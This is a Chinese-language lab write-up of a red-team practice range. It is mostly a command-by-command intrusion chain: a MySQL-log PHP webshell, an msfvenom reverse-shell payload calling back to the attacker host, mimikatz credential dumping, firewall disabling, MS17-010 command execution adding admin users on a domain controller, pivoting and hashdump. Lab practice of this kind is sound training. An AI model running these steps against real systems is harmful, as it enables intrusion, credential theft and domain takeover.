最近在参加一些靶场比赛,搭建了红日团队的靶场练习下,以下为记录。
kali攻击机 192.168.180.130
win7双网卡 192.168.180.129 NTE1(内网):192.168.52.143
win2003 192.168.52.141
win2008 192.168.52.138
拓扑图:
0X01 信息收集&WEBSHELL
python Perun.py -l . -t 192.168.180.129 --search all --skip-ping
mysql 弱口令 root root
思路(1):phpmyadmin写shell
1、phpmyadmin基于log日志写shell法
SHOW VARIABLES LIKE "%general%"
查询当前mysql下log日志的默认地址,同时也看下log日志是否为开启状态,并且记录下原地址,方便后面恢复。
set global general_log = on;
开启日志监测,一般是关闭的,
set global general_log_file = "C:/phpStudy/WWW/mianhua.php";
这里设置我们需要写入的路径就可以了。
select "<?php @eval($_POST[mianhuage]);?>";
查询一个一句话,这个时候log日志里就会记录这个。
set global general_log = off;
关闭下日志记录。
蚁剑或菜刀可连接成功:
思路(2):xycms后台写shell
http://192.168.52.143/yxcms/index.php?r=admin/index/login
后台弱口令:admin 123456
写入一句话:
webshell: http://192.168.52.143/yxcms/index.php
0X02 windos提权生成msf shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.180.130 LPORT=4444 -f exe > shell.exe
蚁剑上传后exe后直接目录下执行,上线后通过msf提权。
msf5 > use exploit/multi/hander
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.180.130
msf5 exploit(multi/handler) > set lport 4444
msf5 exploit(multi/handler) > exploit -j
上线后依次执行提权即可。
MSF下打开3389: meterpreter > run post/windows/manage/enable_rdp 或shell下执行D0S命令:
MSF下加载mimikatz获取明文密码: meterpreter > load mimikatz meterpreter > kerberos
注意:netsh advfirewall set allprofiles state off 关闭win7防火墙
0X03 横向移动
meterpreter会话下键入以下命令可创建路由规则:
meterpreter > run autoroute -s 192.168.52.0/24 #添加路由 meterpreter > run autoroute -p #查看路由 meterpreter > run post/windows/gather/arp_scanner rhosts=192.168.52.0/24 # 使用类似arp_scanner的端口模块就能检测到的IP地址
扫描下主机SMB信息:
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.52.0/24
set threads 50
run
挂Socks4a代理 代理nmap和其他工具对主机进行渗透
use auxiliary/server/socks4a
show options
run
sudo proxychains nmap -sV -Pn -p 445 --script smb-vuln-ms17-010.nse 192.168.52.141
可以成功访问到且存在ms17-010
{+] 192.168.52.141:445 - Host is running Windows 2003 (build:3790) (name:ROOT-TVI862UBEH) (domain:GOD) (signatures:optional)
[+] 192.168.52.138:445 - Host is running Windows 2008 R2 Datacenter SP1 (build:7601) (name:OWA) (domain:GOD) (signatures:required)
[+] 192.168.52.143:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:STU1) (domain:GOD) (signatures:optional) 192.168.52.141
通过MS17-010命令执行拿下windows2003(192.168.52.141),
use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.52.141
set command net user mianhua QAZwsx123 /add
run #运行
set command net localgroup administrators mianhua /add
run #运行
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
#开启3389
proxychains rdesktop 192.168.52.141 -u mianhua -p QAZwsx123 #转发端口连接3389
MS17-010拿下域控制器(通过直接ms17-010未返回session):
sudo proxychains nmap -sV -Pn -p 445 --script smb-vuln-ms17-010.nse 192.168.52.138
#存在17-010
proxychains nmap -p 3389 -Pn -sT 192.168.52.138
#检测3389是否打开
set rhosts 192.168.52.138
set command netsh advfirewall set allprofiles state off
#关闭防火墙
run
#运行
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
#打开3389
run
#运行
sudo proxychains rdesktop -u administrator -p QAZwsx123 192.168.52.138
#开启了3389直接通过administrator即可登陆。(属于GOD.ORG域内) 此处有个坑直接打MS17-010可能会蓝屏重启无session返回
使用wmi进行操作上传wmi到192.168.52.143(win7)这个机器上去,然后执行:cscript.exe wmiexec.vbs /cmd 192.168.52.138 whoami
跨2级代理,windows2008正向回连攻击机:
msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > 1shell.exe
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > 1shell.exe
kali监听:
exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.52.138
#上线靶机地址
加载获取hash
run post/windows/gather/smart_hashdump
